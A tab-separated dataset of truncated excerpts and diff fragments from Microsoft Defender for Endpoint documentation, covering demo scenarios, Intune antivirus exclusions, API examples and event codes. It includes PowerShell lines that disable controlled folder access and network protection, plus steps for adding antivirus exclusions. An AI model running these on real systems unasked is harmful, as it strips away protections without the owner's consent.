security	Defender Endpoint Demonstration Block At First Sight Bafs	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-block-at-first-sight-bafs.md	Follow the instructions in [Block at first sight demo](https://demo.wd.microsoft [Block at First Sight](configure-block-at-first-sight-microsoft-defender-antivirus.md) [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security	Defender Endpoint Demonstration Cloud Delivered Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-cloud-delivered-protection.md	Cloud-delivered protection for Microsoft Defender Antivirus, also referred to as [Utilize Microsoft cloud-delivered protection in Microsoft Defender Antivirus](/windows/threat-protection/windows-defender-antivirus/utilize-microsoft-cloud-protection-windows-defender-antivirus?ocid=wd-av-demo-cloud-bottom) [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security	Defender Endpoint Demonstration Controlled Folder Access Test Tool	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-controlled-folder-access-test-tool.md	Set-MpPreference -EnableControlledFolderAccess Disabled ## See also [Controlled folder access](/windows/threat-protection/windows-defender-exploit-guard/controlled-folders-exploit-guard)
security	Defender Endpoint Demonstration Controlled Folder Access	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-controlled-folder-access.md	Cleanup c:\demo encryption run the [encrypt/decrypt file](https://demo.wd.micros ## See also [Controlled folder access](/windows/threat-protection/windows-defender-exploit-guard/controlled-folders-exploit-guard?ocid=wd-av-demo-cfa-bottom)
security	Defender Endpoint Demonstration Exploit Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-exploit-protection.md	Get-ProcessMitigation [Exploit Protection](/windows/threat-protection/windows-defender-exploit-guard/exploit-protection-exploit-guard?ocid=wd-av-demo-ep-bottom) [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security	Defender Endpoint Demonstration Network Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-network-protection.md	Set-MpPreference -EnableNetworkProtection Disabled [Network Protection](network-protection.md) [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security	Defender Endpoint Demonstration Potentially Unwanted Applications	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-potentially-unwanted-applications.md	The Potentially Unwanted Applications (PUA) protection feature in Microsoft Defe [Detect and block Potentially Unwanted Applications](detect-block-potentially-unwanted-apps-microsoft-defender-antivirus.md) [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security	Defender Endpoint Demonstration Smartscreen Url Reputation	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-smartscreen-url-reputation.md	A benign page hosting a malicious advertisement [Microsoft Defender SmartScreen Documentation](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview) [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security	Defender Endpoint Demonstrations	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstrations.md	The following table lists the available demonstrations alphabetically, with thei [Endpoint detection and response \(EDR\) overview](overview-endpoint-detection-response.md) [Microsoft Defender for Endpoint security blog](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/bg-p/MicrosoftDefenderATPBlog)
security	Defender Endpoint False Positives Negatives	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-false-positives-negatives.md	Title: Address false positives/negatives in Microsoft Defender for Endpoint description: Learn how to handle false positives or false negatives in Microsoft Defender for Endpoint. -keywords: antivirus, exception, exclusion, Microsoft Defender for Endpoint, false positive, false negative, blocked file, blocked url -ms.sitesec: library -ms.pagetype: security ms.localizationpriority: medium Previously updated : 04/06/2023 Last updated : 07/18/2023 audience: ITPro The procedures in this section describe how to define exclusions and indicators. In general, you shouldn't need to define exclusions for Microsoft Defender Antivirus. Make sure that you define exclusions sparingly, and that you only include the files, folders, processes, and process-opened files that are resulting in false positives. In addition, make sure to review your defined exclusions regularly. We recommend using [Microsoft Intune](/mem/intune/fundamentals/what-is-intune) to define or edit your antivirus exclusions; however, you can use other methods, such as [Group Policy](/azure/active-directory-domain-services/manage-group-policy) (see [Manage Microsoft Defender for Endpoint](manage-mde-post-migration.md). > [!TIP] -> Need help with antivirus exclusions? See [Configure and validate exclusions for Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md). +> Need help with antivirus exclusions? See [Configure and validate exclusions for Microsoft Defender Antivirus](configure-exclusions-microsoft-defender-antivirus.md). #### Use Intune to manage antivirus exclusions (for existing policies) -1. In the [Microsoft Intune admin center](https://endpoint.microsoft.com), choose Endpoint security \> Antivirus, and then select an existing policy. (If you don't have an existing policy, or you want to create a new policy, skip to [the next procedure](#use-intune-to-create-a-new-antivirus-policy-with-exclusions)). +1. In the [Microsoft Intune admin center](https://intune.microsoft.com), choose Endpoint security \> Antivirus, and then select an existing policy. (If you don't have an existing policy, or you want to create a new policy, skip to [Use Intune to create a new antivirus policy with exclusions](#use-intune-to-create-a-new-antivirus-policy-with-exclusions).) 2. Choose Properties, and next to Configuration settings, choose Edit. 3. Expand Microsoft Defender Antivirus Exclusions and then specify your exclusions. + - Excluded Extensions are exclusions that you define by file type extension. These extensions apply to any file name that has the defined extension without the file path or folder. Separate each file type in the list must be separated with a `\|` character. For example, `lib\|obj`. For more information, see [ExcludedExtensions](/windows/client-management/mdm/policy-csp-defender#excludedextensions). + - Excluded Paths are exclusions that you define by their location (path). These types of exclusions are also known as file and folder exclusions. Separate each path in the list with a `\|` character. For example, `C:\Example\|C:\Example1`. For more information, see [ExcludedPaths](/windows/client-management/mdm/policy-csp-defender#excludedpaths). + - Excluded Processes are exclusions for files that are opened by certain processes. Separate each file type in the list with a `\|` character. For example, `C:\Example. exe\|C:\Example1.exe`. These exclusions aren't for the actual processes. To exclude processes, you can use file and folder exclusions. For more information, see [ExcludedProcesses](/windows/client-management/mdm/policy-csp-defender#excludedprocesses). + 4. Choose Review + save, and then choose Save. #### Use Intune to create a new antivirus policy with exclusions -1. In the [Microsoft Intune admin center](https://endpoint.microsoft.com), choose Endpoint security \> Antivirus \> + Create Policy. +1. In the [Microsoft Intune admin center](https://intune.microsoft.com), choose Endpoint security \> Antivirus \> + Create Policy. -2. Select a platform (such as Windows 10 and later, macOS, or Windows 10 and Windows Server). +2. Select a platform (such as Windows 10, Windows 11, and Windows Server). 3. For Profile, select Microsoft Defender Antivirus exclusions, and then choose Create. -4. Specify a name and description for the profile, and then choose Next. +4. On the Create profile step, specify a name and description for the profile, and then choose Next. 5. On the Configuration settings tab, specify your antivirus exclusions, and then choose Next. + - Excluded Extensions are exclusions that you define by file type extension. These extensions apply to any file name that has the defined extension without the file path or folder. Separate each file type in the list with a `\|` character. For example, `lib\|obj`. For more information, see [ExcludedExtensions](/windows/client-management/mdm/policy-csp-defender#excludedextensions). + - Excluded Paths are exclusions that you define by their location (path). These types of exclusions are also known as file and folder exclusions. Separate each path in the list with a `\|` character. For example, `C:\Example\|C:\Example1`. For more information, see [ExcludedPaths](/windows/client-management/mdm/policy-csp-defender#excludedpaths). + - Excluded Processes are exclusions for files that are opened by certain processes. Separate each file type in the list with a `\|` character. For example, `C:\Example. exe\|C:\Example1.exe`. These exclusions aren't for the actual processes. To exclude processes, you can use file and folder exclusions. For more information, see [ExcludedProcesses](/windows/client-management/mdm/policy-csp-defender#excludedprocesses). + 6. On the Scope tags tab, if you're using scope tags in your organization, specify scope tags for the policy you're creating. (See [Scope tags](/mem/intune/fundamentals/scope-tags).) 7. On the Assignments tab, specify the users and groups to whom your policy should be applied, and then choose Next. (If you need help with assignments, see [Assign user and device profiles in Microsoft Intune](/mem/intune/configuration/device-profile-assign).) If you've worked through all the steps in this article and still need help, cont - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) - [Configure Defender for Endpoint on Android features](android-configure.md)+
security	Defender Endpoint Plan 1 2	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-plan-1-2.md	Defender for Endpoint Plan 1 and 2, Defender for Business, and Microsoft 365 Bus - [Licensing and product terms for Microsoft 365 subscriptions](https://www.microsoft.com/licensing/terms/productoffering/Microsoft365/MCA). - [Microsoft 365 licensing guidance for security & compliance](/office365/servicedescriptions/microsoft-365-service-descriptions/microsoft-365-tenantlevel-services-licensing-guidance/microsoft-365-security-compliance-licensing-guidance)
security	Defender Endpoint Plan 1	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-plan-1.md	See [Microsoft licensing and product terms](https://www.microsoft.com/en-us/lice - [Get started with Defender for Endpoint Plan 1](mde-plan1-getting-started.md) - [Manage Defender for Endpoint Plan 1](manage-mde-post-migration.md) - [Learn about exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security	Defender Endpoint Subscription Settings	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-subscription-settings.md	The license usage report is estimated based on sign-in activities on the device. - [Get started with Microsoft Security (trial offers)](https://www.microsoft.com/security/business/get-started/start-free-trial) - [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md) - [Microsoft Defender for Business](../defender-business/mdb-overview.md) (endpoint protection for small and medium-sized businesses)
security	Defender Endpoint Trial User Guide	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-trial-user-guide.md	The Microsoft Defender for Endpoint evaluation lab is designed to eliminate the - [Microsoft Security technical content library](https://www.microsoft.com/security/content-library/Home/Index) - [Defender for Endpoint demonstration](https://cdx.transform.microsoft.com/experience-detail/d5eca65d-13a3-464d-9171-c24cf9dd6050)
security	Delete Library	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/delete-library.md	DELETE https://api.securitycenter.microsoft.com/api/libraryfiles/script1.ps1 ## Related topic -- [Run live response](run-live-response.md) +- [Run live response](run-live-response.md)
security	Delete Ti Indicator By Id	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/delete-ti-indicator-by-id.md	Here's an example of the request. ```http DELETE https://api.securitycenter.microsoft.com/api/indicators/995 ```
security	Deploy And Manage Using Group Policy	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deploy-and-manage-using-group-policy.md	You can download the files here, [Printer Protection Samples](https://github.com :::image type="content" source="images/create-default.png" alt-text="This is create default screenshot." lightbox="images/create-default.png"::: Combine these two policy rules into [one XML file](https://github.com/microsoft/mdatp-devicecontrol/blob/main/Printer%20Protection%20Samples/Group%20Policy/Printer_Policies.xml). See step 4 from the [Deploy using group policy](deploy-and-manage-using-group-policy.md) section to deploy this configuration.
security	Deploy And Manage Using Intune	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deploy-and-manage-using-intune.md	You can download the files here, [Printer Protection Samples](https://github.com :::image type="content" source="media/188243552-5d2a90ab-dba6-450f-ad8f-86a862f6e739.png" alt-text="A screenshot of policy 2." lightbox= "media/188243552-5d2a90ab-dba6-450f-ad8f-86a862f6e739.png"::: Here's the [sample file](https://github.com/microsoft/mdatp-devicecontrol/blob/main/Printer%20Protection%20Samples/Intune%20OMA-URI/Default%20Deny%20-%20custom%20policy.xml). See step 4 from the [Deploy Printer Protection](deploy-and-manage-using-intune.md) section to deploy the configuration.
security	Deploy Manage Removable Storage Group Policy	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deploy-manage-removable-storage-group-policy.md	For this scenario, you need to create two groups: one removable storage group fo - only need to restrict file system level access Although this case only has one policy, make sure put it under PolicyRules [one XML file](https://github.com/microsoft/mdatp-devicecontrol/blob/main/Removable%20Storage%20Access%20Control%20Samples/Group%20Policy/Block%20Read%20and%20Write%20access%20to%20specific%20file%20_Policy.xml). See step 4 from the [Deploy using group policy](deploy-manage-removable-storage-group-policy.md#deploy-using-group-policy) section to deploy this configuration.
security	Deploy Manage Removable Storage Intune	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deploy-manage-removable-storage-intune.md	For this scenario, you need to create two groups: one group for any removable st Choose + Edit Entry for Entry, as shown in the following screenshot: :::image type="content" source="media/208775366-f2cafb54-eb63-4bcd-b0fe-880f3cba2c1b.png" alt-text="Screenshot showing edit mode for an entry." lightbox="media/208775366-f2cafb54-eb63-4bcd-b0fe-880f3cba2c1b.png":::
security	Deploy Manage Report Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deploy-manage-report-microsoft-defender-antivirus.md	For reporting, Windows events comprise several security event sources, including > [!TIP] > Performance tip Due to a variety of factors, Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's Performance analyzer is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues. You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions. See [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
security	Deployment Strategy	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deployment-strategy.md	Once you have determined the architecture of your environment and have created a ## Next step After choosing your Defender for Endpoint architecture and deployment method continue to [Step 4 - Onboard devices](onboarding.md).
security	Deployment Vdi Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deployment-vdi-microsoft-defender-antivirus.md	If you're looking for information about Defender for Endpoint on non-Windows pla - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) - [Configure Defender for Endpoint on Android features](android-configure.md) - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Detect Block Potentially Unwanted Apps Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/detect-block-potentially-unwanted-apps-microsoft-defender-antivirus.md	For more information, see [Configure and validate exclusions based on file exten - [Next-generation protection](microsoft-defender-antivirus-in-windows-10.md) - [Configure behavioral, heuristic, and real-time protection](configure-protection-features-microsoft-defender-antivirus.md)
security	Device Control Removable Storage Access Control Faq	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-removable-storage-access-control-faq.md	Yes, for Windows and Mac. To set up device control on Windows, use [attack surface reduction rules in Defender for Business](/microsoft-365/security/defender-business/mdb-asr). You'll need [Microsoft Intune](/mem/intune/fundamentals/what-is-intune). The standalone version of Defender for Business does not include Intune, but it can be added on. [Microsoft 365 Business Premium](/microsoft-365/business-premium) does include Intune. See [Microsoft Defender for Endpoint Device Control Removable Storage Access Control](device-control-removable-storage-access-control.md). -To set up device control on Mac, use Intune or Jamf. See [Device Control for macOS](mac-device-control-overview.md). +To set up device control on Mac, use Intune or Jamf. See [Device Control for macOS](mac-device-control-overview.md).
security	Device Control Removable Storage Access Control	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-removable-storage-access-control.md	DeviceEvents \| project Timestamp, DeviceId, DeviceName, InitiatingProcessAccountName, ActionType, Policy, PolicyRuleId, FileInformationOperation, MediaClassName, MediaInstanceId, MediaName, MediaProductId, MediaVendorId, MediaSerialNumber, FileName, FolderPath, FileSize, FileEvidenceLocation, AdditionalFields \| order by Timestamp desc ```
security	Device Control Removable Storage Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-removable-storage-protection.md	To manage external storage, use removable storage access control instead of [dev Description - For more information on Windows, see [BitLocker - Removable Drive Settings](/mem/intune/protect/endpoint-security-disk-encryption-profile-settings). Supported Platform - Windows 10, Windows 11
security	Device Control Report	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-report.md	There might be a delay of up to six hours from the time a media connection occur >
security	Device Discovery Faq	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-discovery-faq.md	The device discovery capabilities have been built to only discover and identify ### You can exclude network lures from active probing Standard discovery supports exclusion of devices or ranges (subnets) from active probing. If you have network lures deployed in place, you can use the Device Discovery settings to define exclusions based on IP addresses or subnets (a range of IP addresses). Defining those exclusions ensure that those devices won't be actively probed and won't be alerted. Those devices are discovered using passive methods only (similar to Basic discovery mode).
security	Device Discovery	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-discovery.md	DeviceNetworkEvents - [Configure device discovery](configure-device-discovery.md) - [Device discovery FAQs](device-discovery-faq.md)
security	Device Health Api Methods Properties	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-health-api-methods-properties.md	Method\|Data type\|Description [Export device antivirus health report](device-health-export-antivirus-health-report-api.md) [Device health and compliance reporting](device-health-reports.md)
security	Device Health Export Antivirus Health Report Api	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-health-export-antivirus-health-report-api.md	Here's an example response: [Export device health methods and properties](device-health-api-methods-properties.md) [Device health and compliance reporting](device-health-reports.md)
security	Device Health Microsoft Defender Antivirus Health	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-health-microsoft-defender-antivirus-health.md	The following table lays out the possible up to date report values for **Securit > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Device Health Reports	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-health-reports.md	To Assign these permissions: - [Create and manage roles for role-based access control](user-roles.md). - [Export device antivirus health details API methods and properties](device-health-api-methods-properties.md)
security	Device Health Sensor Health Os	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-health-sensor-health-os.md	The Windows version trend graph can help you quickly determine whether your orga > [Microsoft Defender Antivirus health](device-health-microsoft-defender-antivirus-health.md#microsoft-defender-antivirus-health-tab)
security	Device Timeline Event Flag	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-timeline-event-flag.md	While navigating the device timeline, you can search and filter for specific eve You can apply additional filters by clicking on the time bar. This will only show events prior to the flagged event. :::image type="content" source="images/device-flag-filter.png" alt-text="Screenshot that shows the device timeline flag with the filter switched on." lightbox="images/device-flag-filter.png":::
security	Download Client Analyzer	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/download-client-analyzer.md	Learn how to download the Microsoft Defender for Endpoint client analyzer on sup 1. The latest stable edition will be integrated into the MDE for Endpoint agent. Ensure that you are running the latest edition for either [macOS](mac-whatsnew.md) or [Linux](linux-whatsnew.md). 2. The latest preview edition is available for direct download from following URL: <https://aka.ms/XMDEClientAnalyzer>
security	Edr In Block Mode	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/edr-in-block-mode.md	The following table lists requirements for EDR in block mode: - [Tech Community blog: Introducing EDR in block mode: Stopping attacks in their tracks](https://techcommunity.microsoft.com/t5/microsoft-defender-atp/introducing-edr-in-block-mode-stopping-attacks-in-their-tracks/ba-p/1596617) -- [Endpoint detection and response (EDR) in block mode frequently asked questions (FAQ)](edr-block-mode-faqs.yml) +- [Endpoint detection and response (EDR) in block mode frequently asked questions (FAQ)](edr-block-mode-faqs.yml)
security	Enable Attack Surface Reduction	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-attack-surface-reduction.md	Example: - [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md) - [Evaluate attack surface reduction](evaluate-attack-surface-reduction.md) - [Attack surface reduction FAQ](attack-surface-reduction.md)
security	Enable Cloud Protection Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-cloud-protection-microsoft-defender-antivirus.md	For more information about allowed parameters, see [Windows Defender WMIv2 APIs] > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Enable Controlled Folders	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-controlled-folders.md	Use `Disabled` to turn off the feature. - [Protect important folders with controlled folder access](controlled-folders.md) - [Customize controlled folder access](customize-controlled-folders.md) - [Evaluate Microsoft Defender for Endpoint](evaluate-mde.md)
security	Enable Exploit Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-exploit-protection.md	For information about customizing the notification when a rule is triggered and - [Evaluate exploit protection](evaluate-exploit-protection.md) - [Configure and audit exploit protection mitigations](customize-exploit-protection.md) - [Import, export, and deploy exploit protection configurations](import-export-exploit-protection-emet-xml.md)
security	Enable Network Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-network-protection.md	Use the following procedure to enable network protection on domain-joined comput - [Evaluate network protection](evaluate-network-protection.md) - [Troubleshoot network protection](troubleshoot-np.md)
security	Enable Troubleshooting Mode	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-troubleshooting-mode.md	DeviceEvents - [Troubleshooting mode scenarios](troubleshooting-mode-scenarios.md) - [Protect security settings with tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md)
security	Enable Update Mdav To Latest Ws	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-update-mdav-to-latest-ws.md	As a local administrator on the server, perform the following steps: ## Related articles [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
security	Endpoint Attack Notifications	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/endpoint-attack-notifications.md	You can create rules to send email notifications for notification recipients. Se ## Next steps - To proactively hunt threats across endpoints, Office 365, cloud applications, and identity, refer to [Microsoft Defender Experts for Hunting](../defender/defender-experts-for-hunting.md).
security	Evaluate Controlled Folder Access	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-controlled-folder-access.md	See [Protect important folders with controlled folder access](controlled-folders * [Protect important folders with controlled folder access](controlled-folders.md) * [Evaluate Microsoft Defender for Endpoint](evaluate-mde.md) * [Use audit mode](audit-windows-defender.md)
security	Evaluate Exploit Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-exploit-protection.md	To review which apps would have been blocked, open Event Viewer and filter for t - [Configure and audit exploit protection mitigations](customize-exploit-protection.md) - [Import, export, and deploy exploit protection configurations](import-export-exploit-protection-emet-xml.md) - [Troubleshoot exploit protection](troubleshoot-exploit-protection-mitigations.md)
security	Evaluate Mde	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-mde.md	Next gen protections help detect and block the latest threats. ## See Also [Microsoft Defender for Endpoint overview](microsoft-defender-endpoint.md)
security	Evaluate Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-microsoft-defender-antivirus.md	You can also download a PowerShell that will enable all the settings described i ## Related topics - [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)-- [Deploy Microsoft Defender Antivirus](deploy-manage-report-microsoft-defender-antivirus.md) +- [Deploy Microsoft Defender Antivirus](deploy-manage-report-microsoft-defender-antivirus.md)
security	Evaluate Network Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-network-protection.md	To review apps that would have been blocked, open Event Viewer and filter for Ev - [Enable network protection](enable-network-protection.md) - [Troubleshoot network protection](troubleshoot-np.md)
security	Evaluation Lab	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluation-lab.md	Your feedback helps us get better in protecting your environment from advanced a Let us know what you think, by selecting Provide feedback. :::image type="content" source="images/send-us-feedback-eval-lab.png" alt-text="The feedback page" lightbox="images/send-us-feedback-eval-lab.png":::
security	Event Error Codes	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/event-error-codes.md	See the following table for a list of events recorded by the service. \|32\|Microsoft Defender for Endpoint service failed to request to stop itself after offboarding process. Failure code: %1\|An error occurred during offboarding.\|Reboot the device.\| \|33\|Microsoft Defender for Endpoint service failed to persist SENSE GUID. Failure code: `variable`.\|A unique identifier is used to represent each device that is reporting to the portal. <p> If the identifier doesn't persist, the same device might appear twice in the portal.\|Check registry permissions on the device to ensure the service can update the registry.\| \|34\|Microsoft Defender for Endpoint service failed to add itself as a dependency on the Connected User Experiences and Telemetry service, causing onboarding process to fail. Failure code: `variable`.\|An error occurred with the Windows telemetry service.\|[Ensure the diagnostic data service is enabled](troubleshoot-onboarding.md#ensure-that-microsoft-defender-antivirus-is-not-disabled-by-a-policy). <p> Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. <p> See [Onboard Windows client devices](configure-endpoints.md).\| - \|35\|Microsoft Defender for Endpoint service failed to remove itself as a dependency on the Connected User Experiences and Telemetry service. Failure code: `variable`.\|An error occurred with the Windows telemetry service during offboarding. The offboarding process continues.\|Check for errors with the Windows diagnostic data service.\| + \|35\| Communication quotas are updated. Disk quota in MB: `variable`, daily upload quota in MB: `variable`\| Variable = disk quota in MB. \|Normal operating notification; no action required.\| \|36\|Microsoft Defender for Endpoint Connected User Experiences and Telemetry service registration succeeded. Completion code: `variable`.\|Registering Defender for Endpoint with the Connected User Experiences and Telemetry service completed successfully.\|Normal operating notification; no action required.\| \|37\|Microsoft Defender for Endpoint A module is about to exceed its quota. Module: %1, Quota: {%2} {%3}, Percentage of quota utilization: %4.\|The device has almost used its allocated quota of the current 24-hour window. It's about to be throttled.\|Normal operating notification; no action required.\| \|38\|Network connection is identified as low. Microsoft Defender for Endpoint will contact the server every %1 minutes. Metered connection: %2, internet available: %3, free network available: %4.\|The device is using a metered/paid network and will be contacting the server less frequently.\|Normal operating notification; no action required.\| You can use this table for more information on the Defender for Endpoint events - [Client analyzer overview](overview-client-analyzer.md) - [Download and run the client analyzer](download-client-analyzer.md) - [Understand the analyzer HTML report](analyzer-report.md)
security	Exclude Devices	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exclude-devices.md	You'll be able to stop excluding a device at any time. Once devices are no longe ## See also - [Device inventory](machines-view-overview.md)
security	Experts On Demand	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/experts-on-demand.md	It's crucial to respond in quickly to keep the investigation moving. - To proactively hunt threats across endpoints, refer to [Endpoint Attack Notification](../defender-endpoint/endpoint-attack-notifications.md). - To proactively hunt threats across endpoints, Office 365, cloud applications, and identity, refer to [Microsoft Defender Experts for Hunting](../defender/defender-experts-for-hunting.md).
security	Exploit Protection Reference	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exploit-protection-reference.md	This mitigation is incompatible with the Arbitrary Code Guard mitigation. ### Configuration options Audit Only - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Microsoft Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
security	Exploit Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exploit-protection.md	The table in this section indicates the availability and support of native mitig - [Configure and audit exploit protection mitigations](customize-exploit-protection.md) - [Troubleshoot exploit protection](troubleshoot-exploit-protection-mitigations.md) - [Optimize ASR rule deployment and detections](configure-machines-asr.md)
security	Export Certificate Inventory Assessment	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/export-certificate-inventory-assessment.md	GET https://api.securitycenter.contoso.com/api/machines/certificateAssessmentExp "generatedTime":"2022-03-20T13:18:00Z" } ```
security	Export Firmware Hardware Assessment	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/export-firmware-hardware-assessment.md	GET https://api.security.microsoft.com/api/machines/HardwareFirmwareInventoryExp } ```
